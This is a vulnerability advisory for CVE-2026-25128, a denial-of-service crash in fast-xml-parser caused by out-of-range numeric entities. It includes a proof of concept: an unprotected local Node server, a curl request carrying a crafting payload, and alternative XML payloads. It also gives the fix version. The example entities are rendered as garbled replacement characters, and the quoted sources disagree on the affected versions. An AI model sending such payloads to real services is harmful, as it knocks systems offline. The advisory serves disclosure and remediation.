CVE-2026-25128: fast-xml-parser has RangeError DoS Numeric Entities Bug
Summary A RangeError vulnerability exists in the numeric entity processing of fast-xml-parser when parsing XML with out-of-range entity code points (e.g., � or �). This causes the parser to throw an uncaught exception, crashing any application that processes untrusted XML input.
Details The vulnerability exists in /src/xmlparser/OrderedObjParser.js at lines 44-45:
javascript "numdec": { regex: /&#([0-9]{1,7});/g, val : (, str) => String.fromCodePoint(Number.parseInt(str, 10)) }, "numhex": { regex: /&#x([0-9a-fA-F]{1,6});/g, val : (, str) => String.fromCodePoint(Number.parseInt(str, 16)) },
The String.fromCodePoint() method throws a RangeError when the code point exceeds the valid Unicode range (0 to 0x10FFFF / 1114111). The regex patterns can capture values far exceeding this: - [0-9]{1,7} matches up to 9,999,999 - [0-9a-fA-F]{1,6} matches up to 0xFFFFFF (16,777,215)
The entity replacement in replaceEntitiesValue() (line 452) has no try-catch:
javascript val = val.replace(entity.regex, entity.val);
This causes the RangeError to propagate uncaught, crashing the parser and any application using it. PoC Setup
Create a directory with these files:
poc/ ├── package.json ├── server.js
package.json json { "dependencies": { "fast-xml-parser": "^5.3.3" } }
server.js javascript const http = require('http'); const { XMLParser } = require('fast-xml-parser');
const parser = new XMLParser({ processEntities: true, htmlEntities: true });
http.createServer((req, res) => { if (req.method === 'POST' && req.url === '/parse') { let body = ''; req.on('data', c => body += c); req.on('end', () => { const result = parser.parse(body); // No try-catch - will crash! res.end(JSON.stringify(result)); }); } else { res.end('POST /parse with XML body'); } }).listen(3000, () => console.log('http://localhost:3000'));
Run
bash Setup npm install
Terminal 1: Start server node server.js
Terminal 2: Send malicious payload (server will crash) curl -X POST -H "Content-Type: application/xml" -d '<?xml version="1.0"?><root>�</root>' http://localhost:3000/parse Result
Server crashes with: RangeError: Invalid code point 9999999
Alternative Payloads
xml <!-- Hex variant --> <?xml version="1.0"?><root>�</root>
<!-- In attribute --> <?xml version="1.0"?><root attr="�"/>
Impact Denial of Service (DoS): Any application using fast-xml-parser to process untrusted XML input will crash when encountering malformed numeric entities. This affects:
- API servers accepting XML payloads - File processors parsing uploaded XML files - Message queues consuming XML messages - RSS/Atom feed parsers - SOAP/XML-RPC services
A single malicious request is sufficient to crash the entire Node.js process, causing service disruption until manual restart.
Other sources
fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. In versions 4.3.6 through 5.3.3, a RangeError vulnerability exists in the numeric entity processing of fast-xml-parser when parsing XML with out-of-range entity code points (e.g., � or �). This causes the parser to throw an uncaught exception, crashing any application that processes untrusted XML input. Version 5.3.4 fixes the issue.
— NVD
fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. In versions 5.0.9 through 5.3.3, a RangeError vulnerability exists in the numeric entity processing of fast-xml-parser when parsing XML with out-of-range entity code points (e.g., � or �). This causes the parser to throw an uncaught exception, crashing any application that processes untrusted XML input. Version 5.3.4 fixes the issue.
— MITRE
fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. In versions 5.0.9 through 5.3.3, a RangeError vulnerability exists in the numeric entity processing of fast-xml-parser when parsing XML with out-of-range entity code points (e.g., 陿 or ). This causes the parser to throw an uncaught exception, crashing any application that processes untrusted XML input. Version 5.3.4 fixes the issue.
— IBM
Affected Software
Remediation
Event History
Frequently Asked Questions
What is the severity of CVE-2026-25128?
CVE-2026-25128 has been classified as a denial of service vulnerability due to its potential to crash the `fast-xml-parser` when processing out-of-range numeric entities.
How do I fix CVE-2026-25128?
To mitigate CVE-2026-25128, upgrade the `fast-xml-parser` package to version 5.3.4 or later.
Which versions are affected by CVE-2026-25128?
CVE-2026-25128 affects `fast-xml-parser` versions from 4.3.6 to 5.3.3.
What causes the vulnerability in CVE-2026-25128?
CVE-2026-25128 is caused by the parser's inability to handle numeric entities with out-of-range code points, resulting in a RangeError.
Is CVE-2026-25128 a common vulnerability?
While not extremely common, CVE-2026-25128 could pose risks in applications heavily using XML parsing without proper entity validation.